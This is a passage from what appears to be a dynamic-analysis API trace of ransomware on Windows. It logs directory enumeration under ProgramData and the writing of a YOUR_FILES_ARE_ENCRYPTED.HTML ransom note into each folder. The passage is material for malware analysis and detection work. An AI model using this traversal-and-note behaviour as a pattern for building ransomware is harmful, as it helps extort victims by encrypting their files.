ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2401ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 82 [0157.237] lstrcmpW (lpString1="usertile36.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.237] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf242815c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 82 [0157.237] lstrcmpW (lpString1="usertile37.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.237] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b3766e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b3766e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf244e2bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile38.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0157.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b5d7d6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b5d7d6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf247441c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0157.238] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile39.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0157.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b8393e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b8393e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0157.238] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile40.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0157.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ba9aa6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52ba9aa6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0157.238] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile41.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bcfc0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bcfc0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf257edbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0157.239] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 82 [0157.239] lstrcmpW (lpString1="usertile42.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.239] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0157.239] lstrlenW (lpString=".bmp") returned 4 [0157.239] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bf5d76, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bf5d76, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25a4f1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0157.239] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 82 [0157.239] lstrcmpW (lpString1="usertile43.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.239] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0157.239] lstrlenW (lpString=".bmp") returned 4 [0157.239] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c1bede, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52c1bede, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25cb07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0157.239] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 82 [0157.239] lstrcmpW (lpString1="usertile44.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.239] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0157.239] lstrlenW (lpString=".bmp") returned 4 [0157.239] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c1bede, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52c1bede, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25cb07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 0 [0157.239] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.241] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0157.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.245] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.247] CloseHandle (hObject=0x5a0) returned 1 [0157.248] GetProcessHeap () returned 0x270000 [0157.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.249] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0157.249] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0157.249] lstrcmpW (lpString1="guest.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.249] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0157.249] lstrlenW (lpString=".bmp") returned 4 [0157.249] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0157.249] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0157.249] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0157.249] lstrcmpW (lpString1="user.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.249] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0157.249] lstrlenW (lpString=".bmp") returned 4 [0157.249] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0157.249] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="user.bmp", cAlternateFileName="")) returned 0 [0157.249] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.250] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0157.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\user account pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.250] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.317] CloseHandle (hObject=0x598) returned 1 [0157.317] GetProcessHeap () returned 0x270000 [0157.318] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.318] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Vault", cAlternateFileName="")) returned 1 [0157.318] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned 34 [0157.318] GetProcessHeap () returned 0x270000 [0157.318] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.318] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" [0157.318] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*" [0157.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.319] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.319] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x7ae5fbe5, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.319] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.319] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0157.319] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.320] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.322] CloseHandle (hObject=0x598) returned 1 [0157.323] GetProcessHeap () returned 0x270000 [0157.325] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.325] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1aaf0d60, ftLastAccessTime.dwHighDateTime=0x1d70563, ftLastWriteTime.dwLowDateTime=0x1aaf0d60, ftLastWriteTime.dwHighDateTime=0x1d70563, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0157.325] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xec3b64df, ftLastAccessTime.dwHighDateTime=0x1cb88fc, ftLastWriteTime.dwLowDateTime=0xec3b64df, ftLastWriteTime.dwHighDateTime=0x1cb88fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0157.325] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned 45 [0157.325] GetProcessHeap () returned 0x270000 [0157.325] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.325] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" [0157.325] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*" [0157.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xec3b64df, ftLastAccessTime.dwHighDateTime=0x1cb88fc, ftLastWriteTime.dwLowDateTime=0xec3b64df, ftLastWriteTime.dwHighDateTime=0x1cb88fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.328] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xec3b64df, ftLastAccessTime.dwHighDateTime=0x1cb88fc, ftLastWriteTime.dwLowDateTime=0xec3b64df, ftLastWriteTime.dwHighDateTime=0x1cb88fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.328] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0157.328] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned 64 [0157.328] GetProcessHeap () returned 0x270000 [0157.328] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.328] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" [0157.328] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*" [0157.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.329] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.329] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Backup", cAlternateFileName="")) returned 1 [0157.329] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 71 [0157.329] GetProcessHeap () returned 0x270000 [0157.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.332] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0157.332] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*" [0157.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x4ebd848 | out: 